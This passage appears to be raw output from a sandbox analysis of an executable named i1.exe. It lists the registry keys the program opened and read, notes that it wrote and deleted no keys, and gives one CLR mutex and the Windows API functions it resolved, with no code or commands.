HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.d3.resources_it-IT_96cbd02afd56cf46 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\afbae67\87e05e7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.d3.resources_it_96cbd02afd56cf46 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\afbae67\41529c91 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}__3e56350693f7355e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\433351e7\2db83a0b HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\i1.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B21A317C HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B21A317C HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Write Keys
Nothing to display
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName 